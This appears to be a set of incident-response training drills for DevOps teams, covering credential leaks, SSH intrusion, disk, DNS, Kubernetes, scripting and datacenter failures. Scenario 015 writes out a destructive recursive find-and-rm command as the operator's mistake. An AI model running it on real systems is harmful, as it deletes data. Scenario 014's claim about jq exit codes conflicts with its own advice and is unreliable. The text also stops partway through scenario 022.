Incident Response Scenarios
Practice triage, containment, and resolution with these scenario drills.
60 scenarios
ir-scenario-001 — Secrets Handling 🟡
An engineer posts a screenshot in Slack showing a terminal session. A colleague notices an AWS access key visible in the shell history. The key belongs to a service account with S3 and EC2 permissions. CloudTrail shows the key has not been used from any unusual IP yet.
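The containment side of this drill can be sketched with the AWS CLI. This is a hedged dry-run sketch, not the canonical answer: the service account name and key ID are hypothetical, and the `run` wrapper only echoes each command so the sequence can be reviewed before anything is executed for real.

```shell
# Dry-run wrapper: echoes instead of executing.
# Replace with: run() { "$@"; }  once the commands have been reviewed.
run() { echo "+ $*"; }

SVC_USER="svc-deploy"        # hypothetical service account
KEY_ID="AKIAXXXXEXAMPLE"     # hypothetical exposed access key ID

# 1. Disable the exposed key immediately (a replacement can follow).
run aws iam update-access-key --user-name "$SVC_USER" \
    --access-key-id "$KEY_ID" --status Inactive

# 2. Issue a replacement key for the service account.
run aws iam create-access-key --user-name "$SVC_USER"

# 3. Look for any use of the old key in CloudTrail.
run aws cloudtrail lookup-events \
    --lookup-attributes AttributeKey=AccessKeyId,AttributeValue="$KEY_ID" \
    --start-time "$(date -u -d '48 hours ago' +%Y-%m-%dT%H:%M:%SZ)"
```

Deactivating first and rotating second avoids a window where the old key still works while a new one is being wired into dependent services.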
Expected actions
- Immediately rotate the exposed AWS access key via IAM console or CLI
- Check CloudTrail for any unauthorized usage of the key in the last 24-48 hours
- Revoke any active sessions associated with the compromised credentials
- Audit the service account permissions and reduce to least privilege if over-scoped
- Delete the Slack message containing the screenshot
- Notify the security team and open an incident ticket
- Review how the key ended up in shell history and remediate (use env vars or credential helpers)

Common pitfalls
- Delaying rotation because CloudTrail looks clean — attackers may not have acted yet
- Forgetting to check for derived credentials or cached sessions
- Rotating the key without updating services that depend on it, causing an outage
- Not checking if the key was also committed to a git repo

ir-scenario-002 — Incident Response 🟡
Your SIEM alerts on a successful SSH login to a production bastion host from an IP in a country where your company has no employees. The login used a valid user account. The user is currently on PTO and unreachable. The session is still active.
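A dry-run sketch of the immediate session-kill and lockout steps (the username and TTY are hypothetical; `run` echoes each command for review rather than executing it):

```shell
# Dry-run wrapper; swap in run() { "$@"; } to actually execute.
run() { echo "+ $*"; }

USER_NAME="jdoe"    # hypothetical compromised account

# Find the intruder's TTY and source IP before killing anything.
run who -u
run last -i

# Kill the active session by TTY (value taken from the who output).
run pkill -KILL -t pts/3

# Lock the account and review its authorized_keys for persistence.
run usermod --lock "$USER_NAME"
run cat /home/"$USER_NAME"/.ssh/authorized_keys
```

If the extra seconds are acceptable, capture volatile state first (`netstat -tpn`, `ps auxf`) since it disappears once the session and its children die.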
Expected actions
- Kill the active SSH session immediately (find the TTY with who -u, then pkill -t; or terminate the instance)
- Disable or lock the compromised user account
- Capture volatile evidence before killing the session if possible (netstat, ps, last)
- Check auth logs for brute-force attempts or other compromised accounts
- Audit what commands were executed during the session (bash_history, auditd)
- Rotate the user's SSH keys and any credentials accessible from the bastion
- Check for lateral movement to other hosts from the bastion
- Notify the security team and escalate per incident response plan

Common pitfalls
- Waiting for the user to respond before acting — the session is active now
- Rebooting the host and destroying volatile forensic evidence
- Only killing the session without checking for persistence mechanisms (cron, authorized_keys)
- Forgetting to check if the attacker pivoted to internal systems

ir-scenario-003 — Incident Triage 🔴
A monitoring alert fires for abnormally high outbound network traffic from a web server. Investigation shows a process called "kworker2" consuming CPU and making connections to external IPs on port 443. The real kworker is a kernel thread and should not make network connections. The server handles production traffic.
Expected actions
- Isolate the host from the network (security group / firewall rule) but keep it running for forensics
- Redirect production traffic to other healthy instances first
- Capture process details (ps auxf, /proc/)

Common pitfalls
- Killing the process without capturing forensic evidence first
- Shutting down the server and losing memory-resident malware evidence
- Trying to clean the compromised server instead of rebuilding from scratch
- Not checking other servers for lateral movement
- Forgetting to investigate the initial access vector

ir-scenario-004 — Backup & Restore 🟡
During a quarterly disaster recovery drill, the database team attempts to restore a PostgreSQL backup to the DR environment. The pg_restore command completes without errors, but the application reports missing tables and the row count is 40% lower than production. The backup job has been reporting success in monitoring for months.
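The schema comparison can be mechanized with pg_dump and diff. The sketch below substitutes two fabricated dump files for real pg_dump output (database and table names are made up) so the comparison mechanic is visible without a live cluster:

```shell
# In reality these files would come from:
#   pg_dump --schema-only -h prod-host appdb > prod_schema.sql
#   pg_dump --schema-only -h dr-host   appdb > dr_schema.sql
printf 'CREATE TABLE users;\nCREATE TABLE orders;\nCREATE TABLE invoices;\n' > prod_schema.sql
printf 'CREATE TABLE users;\nCREATE TABLE orders;\n' > dr_schema.sql

# Objects present in production but missing from the restored DR copy
# show up as '<' lines in the diff:
diff prod_schema.sql dr_schema.sql | grep '^<'
```

The same two-dump diff works for row-count audits if each side is replaced by a `SELECT relname, n_live_tup FROM pg_stat_user_tables` export.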
Expected actions
- Compare schemas between production and restored DB (pg_dump --schema-only diff)
- Check if the backup job is only backing up a subset of schemas or databases
- Verify the backup schedule captures all tablespaces and databases
- Check if recent schema migrations added tables not included in backup scope
- Review backup job configuration for excluded patterns or filters
- Verify backup retention — the latest backup may not be the one restored
- Fix backup scope and run an immediate verified full backup
- Schedule a follow-up restore test within one week to confirm the fix

Common pitfalls
- Trusting backup job exit codes without verifying data integrity
- Not comparing row counts and schema between backup and source
- Blaming the DR environment for the discrepancy before checking backup completeness
- Not auditing how long the backup has been incomplete (could be months)

ir-scenario-005 — Alerting Rules 🟡
At 3:00 AM, PagerDuty fires 200+ alerts in 10 minutes across multiple services. Alerts include: high latency on API gateway, connection pool exhaustion on three microservices, disk space warnings on log aggregator, and certificate expiry warnings. The on-call engineer is overwhelmed.
Expected actions
- Do NOT try to fix everything at once — triage for the root cause
- Look for a common upstream dependency (database, DNS, network, shared storage)
- Check recent deployments or config changes in the last 1-2 hours
- Mute duplicate/downstream alerts to reduce noise
- Focus on the earliest alert — it often points to root cause
- Check core infrastructure health (DNS, load balancers, database, network)
- Escalate and pull in additional engineers if needed
- Communicate status in the incident channel

Common pitfalls
- Trying to fix each alert individually instead of finding the common cause
- Ignoring the earliest alert because it seems minor
- Not checking for recent deployments or changes
- Working alone for too long without escalating
- Silencing alerts without understanding why they fired

ir-scenario-006 — DNS 🟡
Multiple teams report that internal services can't reach each other. External services work fine. nslookup for internal hostnames returns SERVFAIL. The CoreDNS pods in your Kubernetes cluster show CrashLoopBackOff. The issue started 15 minutes ago.
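A dry-run triage sequence for this drill, assuming the default kube-system naming for CoreDNS (the `run` wrapper echoes commands instead of executing them, so the order can be reviewed first):

```shell
run() { echo "+ $*"; }   # dry-run; replace with run() { "$@"; } to execute

# Why is CoreDNS crashing? Read logs and events before restarting anything.
run kubectl -n kube-system logs -l k8s-app=kube-dns --previous --tail=50
run kubectl -n kube-system describe pods -l k8s-app=kube-dns

# Was the Corefile changed recently?
run kubectl -n kube-system get configmap coredns -o yaml

# After fixing/rolling back the Corefile, restart and verify from a pod.
run kubectl -n kube-system rollout restart deployment coredns
run kubectl run dns-test --rm -it --image=busybox --restart=Never \
    -- nslookup kubernetes.default
```

The `--previous` flag matters for CrashLoopBackOff: the interesting error is usually in the container that just died, not the one currently starting.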
Expected actions
- Check CoreDNS pod logs for the crash reason (kubectl logs, kubectl describe)
- Check if a recent ConfigMap change broke CoreDNS (review Corefile)
- Check node resource pressure — CoreDNS pods may be OOMKilled
- Verify upstream DNS resolvers are reachable from the cluster
- As a temporary workaround, consider restarting CoreDNS or scaling up replicas
- If ConfigMap was changed, roll back to the last known good version
- Verify resolution works after fix with nslookup from multiple pods
- Post-incident, add monitoring for CoreDNS health and Corefile validation in CI

Common pitfalls
- Restarting CoreDNS repeatedly without reading the logs
- Not checking for recent ConfigMap or Corefile changes
- Forgetting that CoreDNS serves cluster DNS — all service-to-service communication depends on it
- Not having a cached copy of the last working Corefile for rollback

ir-scenario-007 — Kubernetes Core 🟡
A deployment rollout is stuck at 2/5 replicas updated. The new pods are in CrashLoopBackOff. The old pods are still serving traffic. The engineering team wants to push a fix forward, but the on-call thinks rollback is safer. There is a database migration that already ran.
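A dry-run of the diagnose-then-decide sequence (the deployment name is hypothetical; `run` echoes rather than executes, and the rollback command should only be issued once the migration has been confirmed backward-compatible):

```shell
run() { echo "+ $*"; }   # dry-run; replace with run() { "$@"; } to execute

DEPLOY="web"   # hypothetical deployment name

# Diagnose the crashing new pods before choosing rollback vs fix-forward.
run kubectl logs deploy/"$DEPLOY" --tail=100
run kubectl describe deploy "$DEPLOY"
run kubectl rollout status deploy/"$DEPLOY"

# ONLY if the DB migration is backward-compatible with the old code:
run kubectl rollout undo deploy/"$DEPLOY"
run kubectl rollout history deploy/"$DEPLOY"
```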
Expected actions
- Check new pod logs and events to understand the crash (kubectl logs, describe)
- Assess if the database migration is backward-compatible with the old code
- If migration is backward-compatible, roll back the deployment (kubectl rollout undo)
- If migration is NOT backward-compatible, fix forward is required — prioritize the fix
- Set maxUnavailable/maxSurge to limit blast radius during the fix
- Verify old pods are still healthy and serving traffic
- Communicate clearly about rollback vs fix-forward decision and rationale
- Post-incident, ensure DB migrations are always backward-compatible

Common pitfalls
- Rolling back without checking if the DB migration is backward-compatible
- Pushing a hasty fix forward that introduces new bugs
- Not realizing old pods are still serving and panicking unnecessarily
- Ignoring resource limits as a possible crash cause (OOMKilled)

ir-scenario-008 — Disk Troubleshooting 🟢
Monitoring shows a production server at 98% disk usage. The application is starting to throw write errors. The /var/log partition is the fullest. The server runs a Java application with verbose logging enabled.
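The truncate-versus-delete distinction can be tried safely on a scratch file standing in for /var/log/app.log:

```shell
# Create a stand-in "log" and fill it with noise.
LOG=./app.log
yes "2024-01-01 DEBUG noisy line" | head -n 1000 > "$LOG"
ls -l "$LOG"     # non-zero size

# Truncate in place: the inode survives, so a process with the file open
# keeps logging to it and the space is freed immediately. rm would instead
# leave the space allocated until every writer closes its handle
# (lsof +L1 lists such deleted-but-open files).
: > "$LOG"
wc -c < "$LOG"   # 0
```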
Expected actions
- Identify the largest files and directories (du -sh /var/log/*, find large files)
- Check for large log files that can be truncated (not deleted while process has open handles)
- Truncate the active log file rather than deleting it (> /var/log/app.log)
- Check for deleted files still held open by processes (lsof +L1)
- Implement log rotation if not already configured (logrotate)
- Reduce Java log verbosity from DEBUG/TRACE to INFO or WARN
- Set up disk space alerts at 80% and 90% thresholds
- Consider moving logs to a dedicated partition or log aggregation service

Common pitfalls
- Deleting the log file with rm while the process still has it open (space not freed)
- Restarting the application to free file handles during peak traffic
- Only clearing space without fixing the root cause (logs will fill up again)
- Not checking for other large files outside /var/log (core dumps, tmp files)

ir-scenario-009 — Load Balancing 🟡
Users report intermittent 502 Bad Gateway errors. The ALB health checks show 2 of 4 backend instances as unhealthy. The unhealthy instances respond normally when curled directly from a bastion host. The issue started after a security group change 30 minutes ago.
Expected actions
- Compare the current security group rules with the previous state
- Check if the health check port/path is still allowed in the security group
- Verify the ALB health check configuration (port, path, protocol, thresholds)
- Check if the security group change removed ingress from the ALB's security group
- Remember ALB health checks come from the ALB's own IPs, not the user's IP
- Fix the security group to allow health check traffic from the ALB
- Monitor health checks returning to healthy state
- Add a change management note about LB-to-backend security group dependencies

Common pitfalls
- Assuming the instances are actually unhealthy because the LB says so
- Not connecting the timing of the security group change to the incident
- Only checking the instance security group without checking ALB security group
- Forgetting that ALB health checks need their own ingress rules

ir-scenario-010 — Cloud Deep Dive 🔴
A CI/CD pipeline that deploys to S3 and invalidates CloudFront suddenly starts failing with Access Denied errors. Nothing in the pipeline or IAM role has changed. The IAM policy simulator shows the role should have access. The S3 bucket policy also allows the role. The issue affects only one of three deployment environments.
Expected actions
- Check for S3 bucket policy changes or updates
- Look for Service Control Policies (SCPs) in AWS Organizations that may restrict access
- Check for S3 Block Public Access settings if the bucket was recently modified
- Verify there is no explicit deny in any policy (denies override allows)
- Check for VPC endpoint policies if the pipeline runs in a VPC
- Look for resource-based policy conditions (aws:SourceIp, aws:SourceVpc, MFA)
- Check CloudTrail for the exact error details and which policy caused the deny
- Compare the working environments with the broken one for policy differences

Common pitfalls
- Trusting the IAM policy simulator completely — it does not evaluate SCPs, VPC endpoint policies, or session policies
- Not checking for explicit denies which override any number of allows
- Overlooking S3 bucket policy conditions that restrict by IP or VPC
- Not comparing the broken environment with working ones to isolate the difference

ir-scenario-011 — Database Operations 🔴
A junior engineer ran a DELETE query on the production database without a WHERE clause. They immediately realized the mistake and stopped the query after 8 seconds. The table had 2.4 million rows. The engineer estimates roughly 150,000 rows were deleted. The application is showing errors for some users. The last backup is 6 hours old.
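One hedged shape of the PITR path, assuming an RDS-style managed Postgres with automated backups enabled. The instance identifiers, table name, and timestamp are all hypothetical, and `run` echoes rather than executes:

```shell
run() { echo "+ $*"; }   # dry-run; replace with run() { "$@"; } to execute

# Restore a COPY of the instance to just before the DELETE; never overwrite prod.
run aws rds restore-db-instance-to-point-in-time \
    --source-db-instance-identifier prod-db \
    --target-db-instance-identifier prod-db-pitr \
    --restore-time 2024-05-01T14:29:00Z

# Pull the affected table out of the restored copy for review.
run pg_dump -h prod-db-pitr.example.internal -t orders --data-only \
    -f orders_recovered.sql

# Load into a STAGING table in production, then insert only the rows whose
# primary keys are missing, to avoid duplicate-key collisions with survivors.
run psql -h prod-db.example.internal -f orders_recovered.sql
```

The staging-table merge (rather than a raw re-insert) is what prevents re-inserting the roughly 2.25 million rows that were never deleted.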
Expected actions
- Assess the impact — which users/data are affected by the deleted rows
- Check if the database has point-in-time recovery (PITR) enabled
- If PITR is available, restore to a point just before the DELETE to a separate instance
- Extract the deleted rows from the PITR restore and re-insert into production
- If no PITR, restore the 6-hour-old backup to a separate instance and identify deleted rows
- Reconcile the 6-hour gap using application logs, WAL, or binlog if available
- Do NOT restore over the production database — merge the missing rows back
- Post-incident, restrict production database write access and require WHERE clause linting

Common pitfalls
- Restoring the 6-hour-old backup directly over production (loses 6 hours of other changes)
- Panicking and shutting down the application instead of assessing the actual scope
- Not checking for PITR before falling back to the older backup
- Not restricting production DB access immediately to prevent further mistakes
- Forgetting to reconcile the gap between the backup and the incident time

ir-scenario-012 — CLI Scripting 🟢
A cron job that monitors disk usage runs a grep command to search for error patterns in a log file. The job exits with code 1 every time grep finds no matches, which cron interprets as failure and sends alert emails to the on-call team. The engineer on call believes cron itself is broken and escalates to the infrastructure team. The job has run daily for months with no actual errors found.
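The failure mode is easy to reproduce and fix in a few lines of plain shell (the log file name is made up):

```shell
printf 'all good\nstill good\n' > app.log

# grep exit codes: 0 = match found, 1 = no match, >= 2 = real error.
rc=0
grep -q 'ERROR' app.log || rc=$?
echo "plain grep exit: $rc"        # 1, which cron treats as a failure

# Wrapper that treats "no match" as success but keeps real errors fatal:
count_errors() {
    grep -c 'ERROR' "$1" || [ $? -eq 1 ]
}
count_errors app.log && echo "wrapped: success"
```

`grep ... || true` also works (as the expected actions note), but it swallows exit code 2 as well; the `[ $? -eq 1 ]` form only forgives the no-match case.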
Expected actions
- Reproduce the issue manually by running the cron command interactively
- Check grep's exit code behavior — exit code 1 means no match found, not an error
- Inspect the cron job definition for any error handling or exit code checking
- Modify the script to handle grep exit code 1 explicitly (e.g., grep ... || true)
- Alternatively pipe grep output and check for absence of matches with a conditional
- Verify the fix by running the modified script and confirming exit code 0
- Update cron monitoring to alert only on exit codes of 2 or higher (a real grep error), not exit code 1
- Add a comment in the script explaining the grep exit code semantics

Common pitfalls
- Assuming non-zero exit code always means something is broken
- Changing the cron schedule or moving to a different tool without fixing the root cause
- Adding excessive error suppression (2>/dev/null) that hides real grep errors
- Not testing the fix before deploying to production

ir-scenario-013 — CLI Scripting 🟡
A deployment script works perfectly on the engineer's MacBook and in the staging environment but fails in production with cryptic errors: unrecognized conditional syntax, array declarations not recognized, and RANDOM variable producing literal text. The production server is a minimal Linux install. The script shebang line says #!/bin/sh. Operations confirms the script has not changed since staging passed.
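A few of the offending bash-isms and their POSIX sh equivalents, runnable under dash (the values are made up):

```shell
#!/bin/sh
# POSIX rewrites of three common bash-isms.

x="prod"

# bash: if [[ $x == prod* ]]; then ...
case "$x" in
    prod*) echo "matched with case" ;;
esac

# bash: arr=(a b c); echo "${arr[1]}"
set -- a b c                 # positional parameters as a portable "array"
echo "second item: $2"

# bash: echo $RANDOM
rand=$(awk 'BEGIN { srand(); print int(rand() * 32768) }')
echo "random: $rand"
```

Running the original script as `dash ./script.sh` (or `sh -x`) reproduces the production errors locally, which is the fastest way to find every remaining bash-ism.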
Expected actions
- Check which shell is actually executing the script on the production server
- Identify that /bin/sh on many Linux systems is dash, not bash
- Audit the script for bash-specific syntax — double brackets [[ ]], arrays, $RANDOM, process substitution <()
- Either change the shebang to #!/bin/bash (if bash is installed on the production host)
- Or rewrite offending constructs to POSIX sh equivalents ([ ] for tests, loops for arrays)
- Test the fixed script with dash explicitly on the local machine (dash ./script.sh)
- Add a shellcheck lint step to CI to catch portability issues before deployment
- Document which shell the deployment environment uses in the runbook

Common pitfalls
- Assuming /bin/sh is bash because it is on macOS and some distros
- Installing bash on the production server without checking if that is allowed
- Only fixing the immediate error and not auditing the entire script for other bash-isms
- Not adding a CI check that will catch the same issue on future changes

ir-scenario-014 — CLI Scripting 🟡
A data processing pipeline uses jq to transform a JSON stream of API responses written one object per line. The pipeline runs silently and produces an empty output file. When run manually with a small sample file it works correctly. A check of the input data reveals one line among thousands contains a truncated JSON object due to a network timeout during collection. The pipeline is scheduled to run hourly and has been producing zero-byte output for the past three hours.
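A sketch of the salvage-and-locate steps with jq, using a fabricated three-line input in which line 2 is truncated. The `fromjson?` expression is one way to skip unparseable lines without silently discarding the evidence:

```shell
# Fabricated sample: line 2 is a truncated object.
cat > input.jsonl <<'EOF'
{"id": 1, "status": "ok"}
{"id": 2, "status": "ok
{"id": 3, "status": "ok"}
EOF

# Salvage parseable lines; 'fromjson?' suppresses parse errors per line.
jq -cR 'fromjson?' input.jsonl > clean.jsonl
wc -l < clean.jsonl      # the 2 good lines survive

# Locate the offending line for root-cause analysis instead of discarding it.
n=0
while IFS= read -r line; do
    n=$((n + 1))
    printf '%s\n' "$line" | jq -e . >/dev/null 2>&1 || echo "malformed line: $n"
done < input.jsonl
```

Log the skipped line numbers somewhere durable; the pitfalls below are mostly about losing that evidence.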
Expected actions
- Confirm the output file is truly empty and not a symlink or wrong path
- Run jq with the --exit-status flag to surface errors on invalid input
- Pipe the input through jq -e . to identify the malformed line number
- Use grep -n to find the malformed line in the input for inspection
- Fix the pipeline to skip malformed lines using jq with error handling (try-catch or --raw-input)
- Add input validation before processing (jsonschema check or jq empty test)
- Set up output size alerting so empty output files trigger a warning
- Fix the data collection step to handle network timeouts and write complete JSON only

Common pitfalls
- Assuming the pipeline succeeded because it exited 0 (jq exits 0 even when it skips all input)
- Deleting the malformed input file before capturing the bad line for root cause analysis
- Silently skipping all errors without logging which lines were dropped
- Not fixing the upstream collection bug that created malformed records

ir-scenario-015 — CLI Scripting 🔴
A sysadmin runs find . -name "*.log" -exec rm {} \; from what they believe is /var/app/logs but the terminal was left in /var by accident. The command is actively deleting files. The admin sees output scrolling and recognizes the paths are wrong — system log files are being removed. The system is a production web server currently serving traffic.
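The reason the expected actions warn against restarting daemons is that a deleted file remains readable through any still-open descriptor. That can be demonstrated safely with a scratch file:

```shell
# Create a "log", open a read descriptor on it, then delete the file.
printf 'evidence line 1\nevidence line 2\n' > victim.log
exec 3< victim.log
rm victim.log

ls victim.log 2>/dev/null || echo "directory entry gone"

# The inode is still alive via the open descriptor: copy it back out.
# (For another process, the same data is reachable via /proc/<pid>/fd/N,
# which is what an lsof +L1 listing points at.)
cat <&3 > recovered.log
exec 3<&-

grep -c 'evidence' recovered.log    # both lines recovered
```

Restarting the daemon closes its descriptors and makes this recovery path disappear, which is why backups come out before any restarts happen.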
Expected actions
- Immediately kill the find process with Ctrl+C or kill the PID from another terminal
- Run ps aux | grep find to confirm the process is dead
- Assess which files were deleted by checking recent entries in the auth log, syslog, and app logs before the deletion started
- Check if the application is still serving requests — it may be buffering logs in memory
- Identify the backup strategy and locate the most recent backup of /var/log
- Do NOT restart the application or syslog daemon yet — running processes may still have open file handles to deleted files (lsof +L1)
- Restore critical log files from backup to a recovery directory, then move to /var/log
- Restart log daemons and verify logging resumes correctly
- Write an incident report documenting exactly which files were deleted and recovery steps

Common pitfalls
- Panicking and rebooting the server, losing any chance to recover file handles
- Restarting the application immediately without checking open file handles
- Restoring from backup without verifying the backup is complete
- Not documenting the exact scope of deletion before starting recovery
- Running ls -la after deletion and assuming the empty directory means total data loss

ir-scenario-016 — CLI Scripting 🟡
An awk script processes a report file and sums values in the third column. The totals are consistently wrong by a small amount. The script has been in use for a year. A colleague notices that some rows in the report have consecutive spaces between fields because the report generator right-aligns numbers. The awk script sets FS="[ ]" (a bracket expression matching exactly one literal space) in its BEGIN block. The colleague insists the default FS behavior should handle this but the engineer disagrees.
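The field-splitting difference at issue can be checked on one made-up row with two consecutive spaces. Note that awk special-cases a single-space FS (explicit or default), so only a bracket expression such as FS="[ ]" actually splits on every individual space:

```shell
row='alice  42'    # two spaces between the fields

# Default FS: a single space is special-cased to split on whitespace runs
# and trim leading/trailing whitespace.
printf '%s\n' "$row" | awk '{ print NF, "->", $2 }'               # 2 -> 42

# Explicitly setting FS = " " keeps that same special behavior.
printf '%s\n' "$row" | awk 'BEGIN { FS = " " } { print NF }'      # 2

# A literal one-space separator: every extra space creates an empty field,
# so $2 here is the empty string and the "real" second field shifts to $3.
printf '%s\n' "$row" | awk 'BEGIN { FS = "[ ]" } { print NF }'    # 3
```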
Expected actions
- Reproduce the mismatch with a minimal test file containing consecutive spaces
- Understand the difference: FS="[ ]" matches exactly one literal space, so consecutive spaces produce empty fields and shift the real columns, while the default FS (a single space) is special-cased to trim leading/trailing whitespace and split on any run of whitespace
- Inspect the BEGIN block of the awk script to confirm the literal one-space separator is set
- Either remove the explicit FS assignment to use awk's default whitespace splitting
- Or change the assignment to a regex matching one or more spaces, FS="[[:space:]]+", noting that a regex separator still yields an empty leading field when a line starts with spaces, so the default is usually safer
- Validate the fix against multiple rows including edge cases (leading spaces, trailing spaces)
- Run a diff of the output before and after the fix against a known-correct total
- Update the script comment to explain the field separator choice explicitly

Common pitfalls
- Assuming a literal one-space separator and default whitespace splitting behave the same way
- Preprocessing the file with sed to normalize spacing instead of fixing the awk script
- Only testing the fix on rows without consecutive spaces and missing the edge case
- Using cut instead of awk to work around the issue without understanding the root cause

ir-scenario-017 — Datacenter Ops 🔴
A newly racked server fails to POST after powering on. The monitor shows no video signal. The front panel power LED is solid amber. BMC remote access via iDRAC is reachable and shows POST error codes in the event log. The server was transferred from another datacenter and the memory was reseated during shipping prep. Surrounding servers in the rack are healthy.
Expected actions
- Connect to iDRAC/BMC web interface and read the system event log for POST error codes
- Identify the error category — memory, CPU, PCIe, power, or hardware fault
- Use the server vendor's POST code reference to decode the specific fault
- Physically inspect the memory DIMMs — check seating, correct slot population per the manual, and mixed DIMM types
- Reseat the DIMMs one at a time, powering on after each change to isolate the faulty module
- If POST still fails, check CPU socket for bent pins (if accessible) and PCIe card seating
- Connect a serial console cable and capture full POST output for detailed diagnostics
- If a failed DIMM is identified, swap with a known-good spare and re-POST
- Open a hardware support ticket with the vendor if no obvious physical cause is found

Common pitfalls
- Replacing components without reading the POST codes first
- Ignoring the event log and assuming the problem is software or configuration
- Not following the memory population rules in the hardware manual (wrong slot order)
- Swapping too many components at once making it impossible to identify which was faulty
- Forgetting that amber power LED specifically indicates a hardware or POST fault, not a power supply issue

ir-scenario-018 — Datacenter Ops 🟡
A production storage array reports a RAID-5 array as degraded after one drive failed. The array controller automatically started a rebuild using a hot spare. Twelve hours into the rebuild, I/O throughput across the array has dropped 40% and latency has increased. Applications are slow but still running. The business wants a recovery timeline. Operations wants to speed up the rebuild but is worried about stressing the array further during production hours.
Expected actions
- Check the array controller UI for rebuild progress percentage and estimated completion time
- Review array controller logs for any additional drive errors or reallocated sectors
- Assess application health — determine if the 40% throughput drop is within tolerable bounds or approaching SLA breach
- Do NOT add additional I/O load during the rebuild (avoid large backups, batch jobs, or reindexing)
- Check if rebuild priority is configurable — some controllers allow throttling to balance rebuild speed vs production I/O
- Monitor all remaining drives in the array for SMART errors — a second failure during rebuild means data loss
- Communicate a realistic ETA to the business based on rebuild progress rate
- After rebuild completes, verify array status shows all drives healthy and no errors
- Post-incident, evaluate moving to RAID-6 or increasing spare count for additional fault tolerance

Common pitfalls
- Increasing rebuild priority to maximum during peak production hours without impact assessment
- Ignoring SMART errors on other drives in the array during the rebuild window
- Restarting applications or the storage controller to clear performance alerts
- Telling the business the array is healthy before rebuild completes
- Not checking whether the hot spare is of sufficient size and speed to replace the failed drive

ir-scenario-019 — Datacenter Ops 🟡
PXE network boot works reliably for new servers in the lab but fails in the production rack. The server gets a DHCP offer and ACK from the network, downloads the bootloader filename from DHCP option 67, then times out trying to fetch the kernel image. Lab servers are older hardware; production servers are a newer generation. DHCP and TFTP servers are unchanged. The network team confirms no firewall changes were made.
Expected actions
- Check whether the production server is booting in UEFI or Legacy BIOS mode
- Confirm whether the lab server uses Legacy BIOS and the production server uses UEFI
- Inspect the DHCP server configuration for option 67 — BIOS PXE expects pxelinux.0 while UEFI expects a .efi bootloader
- Check if the DHCP server is configured to send different bootloader filenames based on the client architecture (DHCP option 93)
- On the DHCP server, add or fix architecture-specific bootloader options for UEFI clients
- Verify the UEFI bootloader file exists in the TFTP root directory
- Test PXE boot after the DHCP fix and confirm the kernel loads
- Document BIOS/UEFI differentiation requirements in the PXE setup runbook

Common pitfalls
- Assuming TFTP is failing when the real issue is the wrong bootloader filename being served
- Disabling UEFI Secure Boot to work around the issue without fixing the PXE config
- Replacing network cables or switches before checking boot mode compatibility
- Not testing the fix on multiple units of the new hardware before deploying broadly
- Forgetting to update the PXE config for UEFI clients when existing infrastructure was BIOS-only

ir-scenario-020 — Datacenter Ops 🔴
At 2 AM a temperature alert fires for a server room zone. Multiple servers in one section of the room report thermal throttling via IPMI sensor data. A top-of-rack switch in the same zone is also logging high-temperature warnings. Physical inspection shows a CRAC unit indicator light is amber and not blowing cold air. Other CRAC units in the room are running normally. Some cable bundles in the hot rack run horizontally across the front of the servers blocking intake airflow.
Expected actions
- Confirm the scope immediately — check temperature sensors across all racks to identify which are affected
- Identify the faulty CRAC unit and alert the facilities or data center operations team
- Redistribute load if possible — lower the setpoint or increase fan speed on adjacent CRAC units
- Physically remove or reposition cable bundles blocking server intake airflow in the affected rack
- Monitor server inlet temperatures via IPMI every 5 minutes to track improvement or worsening
- If temperatures continue to rise, begin graceful shutdown of lowest-priority servers in the hot zone
- Contact the CRAC vendor's emergency maintenance line if the unit cannot be reset remotely
- Keep the on-call manager and application owners informed of status and risk of forced shutdown
- Document the timeline and corrective actions for the post-incident review

Common pitfalls
- Assuming a single failing sensor is a false alarm without physically verifying conditions
- Waiting for facilities to respond before taking interim cooling steps (cable management, adjacent CRAC load shift)
- Restarting throttled servers without first reducing temperature — they will throttle again immediately
- Not monitoring the switch temperature separately — switches often fail before servers in heat events
- Closing the incident once temperature drops without fixing the cable management that blocked airflow

ir-scenario-021 — Datacenter Ops 🟡
An alert fires showing a UPS in the server room is at 85% load capacity after a new high-density server was installed. The UPS is rated for 20 kVA. Current load is 17 kVA. The new server draws 2.8 kW. The rack has two PDUs fed from different circuit breakers but both are connected to the same UPS. A second UPS in the room is at 40% load. The battery runtime on the overloaded UPS has dropped to 4 minutes at current draw.
Expected actions
- Confirm the UPS load reading is accurate via the UPS management interface
- Identify which PDU the new server is plugged into and confirm its current draw
- Check if the new server has dual PSUs that can be split across PDUs on different UPS units
- Connect one PSU of the new server to a PDU fed by the second, underloaded UPS
- Verify load on both UPS units after the move and confirm each is below 75% capacity
- Check remaining battery runtime on the previously overloaded UPS after load reduction
- Review all other servers in the rack for dual PSU opportunities to improve load balance
- Update the rack power documentation to reflect the new load distribution
- Set UPS load alerting thresholds at 70% and 80% for earlier warning on future additions

Common pitfalls
- Moving the entire server's power to the second UPS instead of splitting dual PSUs across both
- Assuming the load alert is a monitoring glitch and not physically verifying the UPS
- Not checking battery runtime — a 4-minute runtime is critically short for a graceful shutdown
- Reconfiguring power without updating the rack power documentation
- Ignoring the risk that the overloaded UPS could trip a breaker protecting other servers in the rack

ir-scenario-022 — Prometheus 🟡
After a network policy change in Kubernetes, all Prometheus scrape targets show as DOWN in the Targets page. The services are actually running fine and passing health checks. Application logs show normal request handling. The metrics path on port 9090 is blocked by the new network policy but the health check port 8080 is still allowed. Teams are panicking because dashboards are empty and they believe all services are down.
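One way to express the fix, assuming Prometheus runs in a `monitoring` namespace and scrapes port 9090. The names and labels are hypothetical and should be matched to the real cluster; Kubernetes network policies are additive, so allowing the scrape port this way does not loosen the rest of the restrictive policy.

```shell
# Write the policy to a file so it can be reviewed and diffed before
# applying with: kubectl apply -f allow-prometheus-scrape.yaml
cat > allow-prometheus-scrape.yaml <<'EOF'
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-prometheus-scrape
  namespace: default
spec:
  podSelector: {}              # all pods in this namespace
  policyTypes:
    - Ingress
  ingress:
    - from:
        - namespaceSelector:
            matchLabels:
              kubernetes.io/metadata.name: monitoring
      ports:
        - protocol: TCP
          port: 9090           # metrics port (health checks on 8080 already pass)
EOF

grep -c 'port: 9090' allow-prometheus-scrape.yaml
```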
Expected actions
- Check Prometheus Targets page for the specific scrape error (connection refused vs timeout)
- Verify the services are healthy by hitting their health check endpoints directly
- Review the recently applied network policy to identify which ports and paths it affects
- Compare the network policy ingress rules against the Prometheus scrape port and path
- Update the network policy to allow ingress from the Prometheus pod CIDR on the metrics port
- Verify scrape targets return to UP after the network policy fix
- Communicate to teams that services were never down — only metrics collection was blocked
- Add a CI check or policy validation that ensures metrics ports are included in network policies

Common pitfalls
